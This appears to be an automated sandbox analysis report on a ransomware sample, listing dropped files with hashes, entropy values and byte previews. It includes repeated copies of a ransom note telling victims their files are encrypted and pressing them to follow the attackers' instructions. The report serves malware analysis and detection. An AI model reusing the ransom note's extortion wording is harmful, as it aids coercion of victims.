.-. .n.o.b.
          C:\Users\Public\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\3D Objects\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\AppData\Local\Temp\xa288w44oi.bmp
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 32
          Category:dropped
          Size (bytes):5242934
          Entropy (8bit):5.58128370800569
          Encrypted:false
          SSDEEP:49152:Jbi7aDgY5uwMTQwa9LndLgwxKjvkmAdI0Lof1L083Z9juZ1:AAnLgwQNzfNs1
          MD5:0AD214961CB58BAAC27374BCB0E0F564
          SHA1:CC4E47C4CF146566E7508ABC0360D96CDF695A6C
          SHA-256:9C4BE9FB90DB1AEF7271C2CBA2B466C76D2ABC7B6B77FAABFFA4F05445586DD0
          SHA-512:F86085AC5C20B58D8B4BB450F3066250119998A90D2953C7B40750F2B5CB2D05923D57FCBD33A60D2751F0EC96D71B803487054832A685C87F02BE04CA65AE11
          Malicious:false
          Preview: BM6.P.....6...(............. .......P.............................................B...<...b...........H.......".......f.......7.......}...B...x...........................n...........u.......(...............$.......E...........V...I...U...........|...?...i...7...........+...:.......c...........................1..................._.......<...........-...N...}...F...8...........9...(...}.......-...7.......)...R...{...9...............K.......K...9...............^....... .......m...o...............+...........X...a...R.......V...].......;...V.......m...................U...P...+...#...y.......{.......?...!.......j...1.......p.......\...............................D...k...-...@...*...........{...{.......P.......-...C...q..."...........c.......b.......@...................P...........\.......{.......-...Q...f...................<.......!...............$...........>...l......./...j...........*...!...m...z...i...]...3...........d.......8...W...:...V...U...y.......5...z...T...n...................}.
          C:\Users\user\Contacts\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.84347141248344
          Encrypted:false
          SSDEEP:24:Dn5/1DIZtmNNJa5DptAFhy3eUC/nx90Hdu5Ni/EBMuJRN9nTDB8WzelXADn+zi3j:DnbN0+lQHdsp7N9nHou+Cj
          MD5:A7AD101B29D7135F454A791CEC428A8D
          SHA1:A2F8A6A6DAFB23916AE156D75B55A20659FE588F
          SHA-256:85AD56CBC03C7EF61559DBEA5313128EAF185EDB7493CA79B9F45274B115FD6D
          SHA-512:4C53D46B9DFF14D53641B52AFCA94AF83E5A81326721BD65D2F98D7A2A29739A63B84AB608CE38B0C609B6C8CCFC3FDC2781AD2A06AD5F3ABE639026E034EAEA
          Malicious:false
          Preview: ;.#?w+..dm..<q...............]....o.H.%-I....iu*..G........UQ...V..i.>,...:$X.].YXyQ.....F.ef..S...D/Z??d.=.G"e..o....y...k..J..6...........LH...K..Y.I..E.R*...^..A..E..n...;8...qq.[+!...Z....%?e./.#....4C..~m..J%w.2..#9...&t..Jo..~...YD.......U.....z.........a.6.Um3.......L..*\77......B..z{C.)...P..........x...X~.if....Y-.L.d..0....+]5:.`V...Q.300....Cz.6.c....rJH.._...>1.+.'.....+H.*. .V..f.$...HPkR.......+.......3..6J<.U.s8b.gl.:~....7..e.GD.g.jZ.X.O..Y..................Q{o.....`.7!..Q......LwJa.sZM{.*n..b.ya<.n..5.!.%..Ri.i....X........U..+Q.qM7?H..fe.3Nr..l...'`HP.....P74..$...........M..._...(.Z....... ...o...:{...N..4.[...6T(..f...Oh}.y..j...M..A.R....}..;Eh...........T.....[.f...iYN.<.S.....5..!].f.EKt..Nz..4AX.yD..ND..C.....LRn.G.d.G.!XI9.K....&(.F..".|[..wf......w.......).....{..E.........iR........P0Kda..A.3~.@.!..b..af......=Sj........'u.o....c.......ga......H.*.....a6...Q.l........Tg.Q..C..].C.X.C.Q...F.b.\..,..b.l.......jK..4...
          C:\Users\user\Desktop\EEGWXUHVUG\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\EOWRVPQCCS\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862731619905376
          Encrypted:false
          SSDEEP:24:bQ6ZKUjnYusuvYlMbKnIGnOtsuLV7RVpriEe06lCpXADn+z9P:XJ/5vYebKnIGnOtsUVls0WGu+BP
          MD5:BA41FA871464041EF5F3DA922C8B973A
          SHA1:BC40D7ACA461EA074179698632EE3907E90D2E9B
          SHA-256:F85EA44817DE6877C79703CDCF4DC766D89429DEAA831E2E5D6076D2D3B75FFC
          SHA-512:9D45860CFFC535597547C8C7BD04A8D937F0B4AE8D62CDE6CEBD5FF40F2310447397F695465EABDE73375B2CE1FB470044ED8F40015338AC130C2B17CBBD9680
          Malicious:false
          Preview: .A...2#.u*<<.^C...{.?"J.xW0..X...]7/,...!.l)4..RI.'.J+!.W.....M..C(..r..=...P.=....K..P...'Q .u..)..=...:^.lY.-.."7.>.a}./...O.....]....* ........C....~S.k..).T[..y.....9.$...a,.m.......S.x.<(Tm...[.......w..AS..@.)..3.+,m].K..s.....a..p.k$'.X..+.X..M.vh3~xM.:TF4.?..?..b...#..<.......X....i....,.-...^..Wh...0.}..l9c...!.s.c..&.T.YB.o.....p.H...2........$.%....fE...e..b[4+.38.....EZf.hk....S.......!....9.B.Z.4/q.H&u.V.....S.......W:.Q....Y..*..F.#.V..5V...n........Y`l....G.fU....AY...CX...Nlm@8.....8z/o[..U~..+.P...3.N.I&......j3..{T.q.S....r;..O.a.@.........xg.0NpODZ..o.1.V[..r.@.M..... ...`..#D.f.y...{.f...D^D...i..........Q.......i4.(.>QJ...o..M.. !nP.V8>.....+....f...rI..)VI..V...M.J..]..ir..1...pf......3XV$p..J......3.P.k{}..U..\G...f.8...Y$..,s.}D...9....^....z.j>q1........!.f..>.p[.+...@#@x..C..]t.*l..y..Z#.5./|.e.j\.S..2.5..y.X.Qv.+N...`.S.....i<.P..)...J.^jO..S=..RrF.2U].....'...%......L1q.4I.y..{.....![..bS...-|.5.o...o.....B80.Bi3
          C:\Users\user\Desktop\FENIVHOIKN\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839271363073904
          Encrypted:false
          SSDEEP:24:q/+5ohdPz20+lzAwYgBkcslzVzGGuXiJLyiTHXADn+zDBZIU:Q+MPzelzw9fzGVuT3u+J7
          MD5:6B3CF79188192A79CB78E6502FCF4533
          SHA1:FD2F8DF891063D60E397D88815EABB8372FE40D7
          SHA-256:19E8B6B0A8298C6AE267DADE16B36DD1728E4EAED411D82232DD6B33D9E801BB
          SHA-512:7B0B4AF17AAD8018DED19660DD81373066021C9B1225148137B93CC825D6F7571E0218A86D595E6367071BA0859E59CD80AB423480A7290170DA3C01E7B4C3FA
          Malicious:false
          Preview: <.=.D.d|I.iFv.....H..V./.o...._2..]5...F....M.|T...1..H#3.ZB.......h.3.....M./.+h......`<R....<.A... .G~. .4..3a.R..j.......5Mb..?o8z..(.Z.4...,....k'.T.=.8|..(=.7nJd..U.'.u.).~8.p...YY..5'.7._.%M..[...:6.. *...a....D..3Z.[.E.Z..b......-C.o.i..}...L..uf*.X.>M.q%f.#..F...lS...ja|..@...R..g.+..;..v<.P....i...i2d..........w......>.9H,}.v......J....o..(.......-..U.F. !......._g.J....Q.....H..bc...H..R(e.R...*....d.-+=....[.2_. ...7\.8O+...Y...Y.).[n.t...LlE.....]...a.n.8A.m:...5...<j.._.J.A.i...?...p.B..1.._<v.#....../..`.r.hdv#.9j.vF....dY...M...Do:..Q.A42..a..1......G...2Q.Tv........I......(...Tn.|.S.r..Y.......C.c........w...w...)D.H..I(...a.....+.E...M.s..'Q...y'I..o. .>W.".N-;.Fx5.D...G...o*.^.<..<.<......N.\......x8..&.QP.. \...g..P....& k^m.../.W.0G[]..{......e~.<.....lta..g....Y...K.{7.......H..*.!...?...F&......G."];.T<..M.ob..B..$7......UV.g.i_*G...T.,...L...1.`e.=.v4..f^.....L.=....../.fV.C.....!..5....'K.0>...3..c8.
          C:\Users\user\Desktop\FENIVHOIKN\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.85234148339743
          Encrypted:false
          SSDEEP:24:shQRaJmnvx3Ltg0SCJ3+7982HQqFeOKn9lKCXHOL7NkPA9O8ZksGFsPZ5whXADnD:shSJHB29CqF0fJO3GP75bsYlu+6
          MD5:18078FE691E9169514338BF71EC7E4B4
          SHA1:9098E5D6AAE72356B7C996A9685AA666BF4D21BD
          SHA-256:5F9CDBE4402A50947A5AAAFCDBB84F493D386C6530DC9E13002F4FE2F6735B0E
          SHA-512:DE07845738CFC33DD8B300F780E0E7FA3E5850496C4B95B3EA520EF8CA75D9F8E4C69F5D28B84860788771BDEF7FAF8514B70EDDE60215A049F5F35E6D8E3CE1
          Malicious:false
          Preview: .Wf%..r...q.}...\....q....*._..P..&.$..L.....g.<../7.%.do....A8...v..7f.dt...K..YP..7...]V..h..s....vFs...G.70:...`..%..x. .....${..P......xd..B[......w(-6...... .....J"..@...T..U...G.G...f..W}..+/..1......yvU.{...;r*..P2.A.....K.E..3..L.C1o..}3.6b...`.{&..]1...C....#.c.!..\K3PuyQ"...:P[t\.(.n..N.?....{..5B............R._.:%.q.F9..9 .......M.......xc%.......W.....V...0.W\.1....'...!%l...[...Ay...`.L+....ER..%kT...O-.jc/.$....t.S....b..+..T....Q...W...~GjQr.1,..]'......^.E...~...S:.<E.fi.>.dy.".8.i2....,.Q....;7...CJ.;....e.0B...lp..........#.Iw.l.X......e.j=5N!.m.R...G...}l..@.......*..H.$D..."...d).v.x...E.-+.7I.]....q:x[.....'.4...yXv.)...^."V.......qG].y..........P.....w5...IT..VX.h..p....U..%...R...]..w!s.).G.............@p]M.nJ.........(....$J!..,...Q2.}.l.....kc-..c..A..'.U&..b&m@Y...6..V*.W.bg........2.Onu2M|j.R.y.i.3Z...`...8a.....q1'..C/.q5....Q.U.F......t.<R..oi.....{.n...Gm......../.r.1y.])oU.a.Hp..tNX8}.J.U....1....J.f..'`,
          C:\Users\user\Desktop\FENIVHOIKN\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.840121481125133
          Encrypted:false
          SSDEEP:24:ZtQZlpuJb53oNwWNe/4RbX+WEhHWjCFBmY8Q+C2qaBGbYZoyZr9faDrxavTyVvT+:ZtQxuJb53YwWMARD+WSBmYurZoyZd2r4
          MD5:3B8B464C4634EC856CA99CCA70AD54DF
          SHA1:EFEC8C546092B8B67DDA1875CB31A0CCA07C6823
          SHA-256:16BB854D772AF4FB6A4FC17696308B788D27C29E85AB9A1F3771A5CA768A683F
          SHA-512:8BB914E63AB0501753E9168BFDE4861E6B8F0ACD3D6C38BC65E593CE2A935B532268053614E8DC37C0DB87BC20643F071CAC737E536AA90515EC33F66CB6EA0B
          Malicious:false
          Preview: Q.yW.US#K`...(....w..[2......u.......O....yo.;.~..B.V1...R.A.c.........)E#...Qk.q.........(.o.{.....Xm...-......}..oj..].?.....4g3.9..s.ZO..`.v.6.)....s.~.....\....E....E....(G.0*. 1.aj..Du....|......`...."..mv..F7.(.k...w..p+....=...tW....hZ........A.]."kCS8.FH0.*....,R..!......s...:..*g..~.L...=....y..n....A..Zu2....=..BYF\@.....}_.iPjO.'.Hf.........t[J.[{Rj=|.UR.l'..+..............v4...z*v+&.D#.|..Zn"5..j:.D....E4.....<.........nHn..4..w.`|4.t..H4.Q/..72g..l..x.[.g..;.q.m....m.I5.G..j....V....)u.E.9c.....K.)3D.].=...m..;...rM.<....}N..>...h[.\$-...r.....+.W.4O.1.*&Q..O5r.j.L.-.n+.:(.c...Y..,.*.qb.f.h...D.P.V..G.\.P.(;...M.e.S.6zP....]..4..SD..=..._..S.D)...u.....#.^g.Q..x....y.M..cu).x. .o.+..v./.....,.{R...8...;.....odfQ.Vw...q.?(>.;.....<$.y.5.WK..i.....?;&.....R.Nrr.+...1..W...hoM9Q.W..g,.1....?.Q......>Y..ey....BF...7../.r......b.S...6.;.E.#..5|..O+..)F....K..bqy^.H.*'U{...F'.D...x..+..t>.*..v.}=U./.{|....5'.A....h...TJ....Z...km.;
          C:\Users\user\Desktop\FENIVHOIKN\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.838923952720435
          Encrypted:false
          SSDEEP:24:yB6j1HLcQgQr5Ch/ZtsavtNYMSoXR3vKSeGbW8zgz4f0kMJBeN9XADn+z+06n:yOebtZTzR/0G5kzqzMKHu+K06n
          MD5:1CE81665EA6324F29A3C96DB34E7349D
          SHA1:5371CB9867DAAB95E09A814ECA833708270A6333
          SHA-256:73A56EB4620A9E96CA313BD42CB3495FDEAF44FB4A1410F26D38767628713CF0
          SHA-512:BAEC8F9C5F6186473EDEB3B6599609E5F3AEC6FFC8466BE12518D0B5B0EFFA4A8EE6EBAFA2BA415E34420C07B06B7F4CA40BA1460048C530520EAF7138B67D6D
          Malicious:false
          Preview: J...V..?.m......I:...`*.^..o...x..7`....E.{...1....~..H...&....H`s...%T.......M...lA..5.. .c.j.gQ.<.!s... ...p.J...T$..wT..vl`A...1W=6L.......:.h.....Bi.....6G{^c.].-..:...HC9..R............k..X..u..{..G.R.......a|.Y.\..&.~.D!p..'..G.O...c.a..i.&.l)....|.@.gI.{x..`.y.L...~%..fM......Q~..l..zA.....j.m..6_...m..Tllb.@<.Y......].^.C..0.'....rl.)4.XMy.u..I>...8.t..%.:L..M.....Bd5p|.*..%U.3,.N7....?,..b...n..\......"~.e.].Yf.jv....F8...w.r!....'.7..M.u..py......6..)...HB.e0.........N....[.H..I)`$a...Q.........G..K..3..3@.AK..PR"d.{..Z..J^.0.)[../..)`k.g.R..-..........z.V....._R?.ik.F`.!....lb.{.c......Q6.m2..MkC.......<>kQ,B&..2K/^p.Mp5Z... .$..m...so...B...IZK$.b..I`hp...R..4gT.Ok....r....3...3 ..}..LI.....y.....!wx._e..................)g......AP.(..0*gd.2.!S...._...z.....^..e0......E./7....(.I>M%I ........ ....L..%n..w.......v.T.T..:,4/.l~."G.;....d+....H.b..j.Z*..1q=0|.w.R/.].}k..k.7.%O.|[......=$_..k..Nzsa.....g.fK..x..m.?y.2.wW.
          C:\Users\user\Desktop\FENIVHOIKN\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.852058669848622
          Encrypted:false
          SSDEEP:24:QU6hIVdQFRiAWvHyKvugYUPc6Y/5jcoZfS6fXADn+zZ1:5NV6iAWvHn2xUPc6q5j7ZRfu+T
          MD5:763A5EB82623A416DD9652E4492939C2
          SHA1:E63511C903086273AE8BA6C8F4753A0DAE984680
          SHA-256:801DFDFAD354C8B923582E47A3067C60BEE3667B1EC9227D6DF40C69F13BD3A9
          SHA-512:E31D81FFC01976099EB08761B169230E2079229611BB6171F1BDE7D4519C1FC678B21AB8249110C674DC2402156A4BA91B55275ABD2B9811E9B432388BEAC69D
          Malicious:false
          Preview: .l].........4..4...IM.WK..b..0....q.z]3.VtP..X..C4](...k....V..~....*.,.3.=.......X#....Al......%D...Mi*!<^.$.n....UW-..*;F.I81j..`a.=b.,..4.....wPN......V0.a...,@4...........1.!..$.1}............B/..*a.6..\.#..*:*.]E*...S.....G@.T.A}....ou..|NJ..0.u..X~.;.5P...."...OF..b...]|...&..p.;T..L...........X.... T.o..+..z..4x.?'8.C..o...2......t.....FpTB.E.w.He......v.0.R.s.@..G......j.D.~.>.6x.....EbZ...gy....W..O..>..x...]Y..#..anfp..xb...s/.z.k.K6.V>,.(.l.TBUk..59x./.Mz..I.5....IX....c..>...Q.O6,...T....._.hi3....M..p. /...=.1s.O.`..'}.....M........@......5....9D..s.3....u...K...X?/..:.k...EK9.. ...2....'..zl.-.E.......J. .V.\..g.M.}\Q......y.....+N..z.h.kK.i...7,....Q.^.."..8.G.2.\..k.\H..g..A.h.G.Q...:.@.......u.*,..$.08.."m9P...#....U....p..A..DY.<.n..: ..4..4U9.!.....r.t..F...^.....B/j..G.#0s..y.q..2G. .X..4 ...Z...:.....X.c.......'..Y..0.:i..y.&{5..w/0K.2@qh.!.#Gyb..G..JZN....#..M...^.O...Y.J..n.......&..l.+H.^.{.].#{.c..$.s.5.A]Co5'.f...
          C:\Users\user\Desktop\FENIVHOIKN\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.832268435127478
          Encrypted:false
